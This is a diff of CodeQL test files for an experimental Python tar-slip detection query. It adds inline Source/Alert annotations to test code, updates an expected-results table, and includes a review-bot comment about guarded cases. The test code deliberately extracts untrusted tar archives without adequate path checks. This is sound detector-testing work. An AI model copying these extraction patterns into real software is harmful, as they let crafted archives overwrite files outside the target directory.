| TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | ControlFlowNode for result | +| TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | edges | TarSlipImprov.py:15:1:15:3 | ControlFlowNode for tar | TarSlipImprov.py:17:5:17:10 | ControlFlowNode for member | provenance | | | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:15:1:15:3 | ControlFlowNode for tar | provenance | | 
@@ -223,33 +253,3 @@ nodes subpaths | TarSlipImprov.py:39:65:39:67 | ControlFlowNode for tar | TarSlipImprov.py:26:21:26:27 | ControlFlowNode for tarfile | TarSlipImprov.py:36:12:36:17 | ControlFlowNode for result | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | | TarSlipImprov.py:39:65:39:67 | ControlFlowNode for tar | TarSlipImprov.py:26:21:26:27 | ControlFlowNode for tarfile | TarSlipImprov.py:36:12:36:17 | ControlFlowNode for result [List element] | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | -#select -| TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | ControlFlowNode for result | -| TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | ControlFlowNode for members_filter1() | -| TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | -| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | -| TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | ControlFlowNode for members | -| TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | -| TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | ControlFlowNode for result | -| TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref index a518196b6982..2842a87d0803 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-022bis/TarSlipImprov.ql +query: experimental/Security/CWE-022bis/TarSlipImprov.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlipImprov.py b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlipImprov.py index 15bc66b4aea5..3b59f24e4026 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlipImprov.py 
+++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlipImprov.py @@ -12,14 +12,14 @@ unsafe_filename_tar = sys.argv[2] safe_filename_tar = "safe_path.tar" -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] result = [] for member in tar: if ".." in member.name: raise ValueError("Path in member name !!!") result.append(member) path = unsafe_filename_tar -tar.extractall(path=path, members=result) +tar.extractall(path=path, members=result) # $ Alert[py/tarslip-extended] tar.close() @@ -35,27 +35,27 @@ def members_filter1(tarfile): result.append(member) return result -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(path=tempfile.mkdtemp(), members=members_filter1(tar)) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] +tar.extractall(path=tempfile.mkdtemp(), members=members_filter1(tar)) # $ Alert[py/tarslip-extended] tar.close() -with tarfile.open(unsafe_filename_tar) as tar: +with tarfile.open(unsafe_filename_tar) as tar: # $ Source[py/tarslip-extended] for entry in tar: if ".." in entry.name: raise ValueError("Illegal tar archive entry") - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] def _validate_archive_name(name, target): if not os.path.abspath(os.path.join(target, name)).startswith(target + os.path.sep): raise ValueError(f"Provided language pack contains invalid name {name}") -with tarfile.open(unsafe_filename_tar) as tar: +with tarfile.open(unsafe_filename_tar) as tar: # $ Source[py/tarslip-extended] target = "/tmp/unpack" for entry in tar: _validate_archive_name(entry.name, target) - tar.extract(entry, target) + tar.extract(entry, target) # $ Alert[py/tarslip-extended] def members_filter2(tarfile): 
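Review bot: Several of the new `Alert[py/tarslip-extended]` tags sit on extractions that follow a guard, and nothing in the annotation says why the guarded call is still expected to be flagged. In the `@@ -35,27` hunk `tar.extract(entry, target)` runs after `_validate_archive_name` has compared `os.path.abspath(os.path.join(target, name))` with `target + os.path.sep`; the `".." in member.name` check in the `@@ -12,14` hunk and the `startswith("/")`, `os.path.isabs` and `issym()` checks in the `@@ -251,66` hunk are in the same position. If the intent is that a name-only check leaves link members uncovered, a comment such as `# still flagged: only entry.name is validated, link targets are not` on those cases would record it. If any of them is instead a known false positive of the experimental query, tagging it `# $ SPURIOUS: Alert[py/tarslip-extended]` would stop the expectation from reading as intended behaviour.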
@@ -85,10 +85,10 @@ def _validate_archive_name(name, target): raise ValueError(f"Provided language pack contains invalid name {name}") target = "/tmp/unpack" -with tarfile.open(unsafe_filename_tar, "r") as tar: +with tarfile.open(unsafe_filename_tar, "r") as tar: # $ Source[py/tarslip-extended] for info in tar.getmembers(): _validate_tar_info(info, target) - tar.extractall(target) + tar.extractall(target) # $ Alert[py/tarslip-extended] def members_filter3(tarfile): @@ -108,11 +108,11 @@ def members_filter3(tarfile): tar.close() -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] tarf = tar.getmembers() for f in tarf: if not f.issym(): - tar.extractall(path=tempfile.mkdtemp(), members=[f]) + tar.extractall(path=tempfile.mkdtemp(), members=[f]) # $ Alert[py/tarslip-extended] tar.close() @@ -120,27 +120,27 @@ class MKTar(TarFile): pass tarball = unsafe_filename_tar -with MKTar.open(name=tarball) as tar: +with MKTar.open(name=tarball) as tar: # $ Source[py/tarslip-extended] for entry in tar: - tar._extract_member(entry, entry.name) + tar._extract_member(entry, entry.name) # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -with tarfile.open(tarball) as tar: - tar.extractall() +with tarfile.open(tarball) as tar: # $ Source[py/tarslip-extended] + tar.extractall() # $ Alert[py/tarslip-extended] -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(path=tempfile.mkdtemp(), members=None) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] +tar.extractall(path=tempfile.mkdtemp(), members=None) # $ Alert[py/tarslip-extended] class MKTar(tarfile.TarFile): pass tarball = unsafe_filename_tar -with MKTar.open(name=tarball) as tar: +with MKTar.open(name=tarball) as tar: # $ Source[py/tarslip-extended] for entry in tar: - tar._extract_member(entry, entry.name) + tar._extract_member(entry, entry.name) # $ Alert[py/tarslip-extended] @contextmanager 
@@ -148,7 +148,7 @@ def py2_tarxz(filename): with tempfile.TemporaryFile() as tmp: subprocess.check_call(["xz", "-dc", filename], stdout=tmp.fileno()) tmp.seek(0) - with closing(tarfile.TarFile(fileobj=tmp)) as tf: + with closing(tarfile.TarFile(fileobj=tmp)) as tf: # $ Source[py/tarslip-extended] yield tf def unpack_tarball(tar_filename, dest): @@ -156,7 +156,7 @@ def unpack_tarball(tar_filename, dest): # Py 2.7 lacks lzma support tar_cm = py2_tarxz(tar_filename) else: - tar_cm = closing(tarfile.open(tar_filename)) + tar_cm = closing(tarfile.open(tar_filename)) # $ Source[py/tarslip-extended] base_dir = None with tar_cm as tarc: 
@@ -166,32 +166,32 @@ def unpack_tarball(tar_filename, dest): base_dir = base_name elif base_dir != base_name: print('Unexpected path in %s: %s' % (tar_filename, base_name)) - tarc.extractall(dest) + tarc.extractall(dest) # $ Alert[py/tarslip-extended] return os.path.join(dest, base_dir) unpack_tarball(unsafe_filename_tar, "/tmp/unpack") tarball = unsafe_filename_tar -with tarfile.open(name=tarball) as tar: +with tarfile.open(name=tarball) as tar: # $ Source[py/tarslip-extended] for entry in tar: - tar._extract_member(entry, entry.name) + tar._extract_member(entry, entry.name) # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -with tarfile.open(name=tarball) as tar: +with tarfile.open(name=tarball) as tar: # $ Source[py/tarslip-extended] for entry in tar: - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -tar = tarfile.open(tarball) -tar.extractall("/tmp/unpack/") +tar = tarfile.open(tarball) # $ Source[py/tarslip-extended] +tar.extractall("/tmp/unpack/") # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -with tarfile.open(tarball, "r") as tar: - tar.extractall(path="/tmp/unpack/", members=tar) +with tarfile.open(tarball, "r") as tar: # $ Source[py/tarslip-extended] + tar.extractall(path="/tmp/unpack/", members=tar) # $ Alert[py/tarslip-extended] def members_filter4(tarfile): @@ -207,8 +207,8 @@ def members_filter4(tarfile): tar.close() -with tarfile.open(unsafe_filename_tar, "r") as tar: - tar.extractall(path="/tmp/unpack") +with tarfile.open(unsafe_filename_tar, "r") as tar: # $ Source[py/tarslip-extended] + tar.extractall(path="/tmp/unpack") # $ Alert[py/tarslip-extended] def members_filter5(tarfile): 
@@ -228,12 +228,12 @@ def members_filter5(tarfile): tmp_dir = "/tmp/" read_type = "r:gz" if filename.endswith("tgz") else "r" -with tarfile.open(filename, read_type) as corpus_tar: +with tarfile.open(filename, read_type) as corpus_tar: # $ Source[py/tarslip-extended] members = [] for f in corpus_tar: if not os.path.isfile(os.path.join(tmp_dir, f.name)): members.append(f) - corpus_tar.extractall(tmp_dir, members=members) + corpus_tar.extractall(tmp_dir, members=members) # $ Alert[py/tarslip-extended] def members_filter6(tarfile): 
@@ -251,66 +251,66 @@ def members_filter6(tarfile): archive_path = unsafe_filename_tar target_dir = "/tmp/unpack" -tarfile.open(archive_path, "r").extractall(path=target_dir) +tarfile.open(archive_path, "r").extractall(path=target_dir) # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -with tarfile.open(tarball) as tar: +with tarfile.open(tarball) as tar: # $ Source[py/tarslip-extended] for entry in tar: if entry.isfile(): - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] -with tarfile.open(unsafe_filename_tar) as tar: +with tarfile.open(unsafe_filename_tar) as tar: # $ Source[py/tarslip-extended] for entry in tar: if entry.name.startswith("/"): raise ValueError("Illegal tar archive entry") - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] tarball = unsafe_filename_tar -with tarfile.TarFile(tarball, mode="r") as tar: +with tarfile.TarFile(tarball, mode="r") as tar: # $ Source[py/tarslip-extended] for entry in tar: if entry.isfile(): - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] -with tarfile.open(unsafe_filename_tar) as tar: +with tarfile.open(unsafe_filename_tar) as tar: # $ Source[py/tarslip-extended] for entry in tar: if os.path.isabs(entry.name): raise ValueError("Illegal tar archive entry") - tar.extract(entry, "/tmp/unpack/") + tar.extract(entry, "/tmp/unpack/") # $ Alert[py/tarslip-extended] -with tarfile.TarFile(unsafe_filename_tar, mode="r") as tar: - tar.extractall(path="/tmp/unpack") +with tarfile.TarFile(unsafe_filename_tar, mode="r") as tar: # $ Source[py/tarslip-extended] + tar.extractall(path="/tmp/unpack") # $ Alert[py/tarslip-extended] -tar = tarfile.open(filename) -tar.extractall(path=tempfile.mkdtemp(), members=tar.getmembers()) +tar = tarfile.open(filename) # $ Source[py/tarslip-extended] +tar.extractall(path=tempfile.mkdtemp(), members=tar.getmembers()) # $ 
Alert[py/tarslip-extended] tar.close() -tar = tarfile.open(unsafe_filename_tar) -tar.extractall(path=tempfile.mkdtemp(), members=None) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] +tar.extractall(path=tempfile.mkdtemp(), members=None) # $ Alert[py/tarslip-extended] tar.extractall(path=tempfile.mkdtemp(), members=members_filter4(tar)) tar.close() -with tarfile.TarFile(unsafe_filename_tar, mode="r") as tar: - tar.extractall(path="/tmp/unpack/", members=tar) +with tarfile.TarFile(unsafe_filename_tar, mode="r") as tar: # $ Source[py/tarslip-extended] + tar.extractall(path="/tmp/unpack/", members=tar) # $ Alert[py/tarslip-extended] -tar = tarfile.open(unsafe_filename_tar) +tar = tarfile.open(unsafe_filename_tar) # $ Source[py/tarslip-extended] result = [] for member in tar: if member.issym(): raise ValueError("But it is a symlink") result.append(member) -tar.extractall(path=tempfile.mkdtemp(), members=result) +tar.extractall(path=tempfile.mkdtemp(), members=result) # $ Alert[py/tarslip-extended] tar.close() archive_path = unsafe_filename_tar target_dir = "/tmp/unpack" -tarfile.TarFile(unsafe_filename_tar, mode="r").extractall(path=target_dir) \ No newline at end of file +tarfile.TarFile(unsafe_filename_tar, mode="r").extractall(path=target_dir) # $ Alert[py/tarslip-extended] \ No newline at end of file diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected index 6b618335d810..eecdfd0494fb 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected 
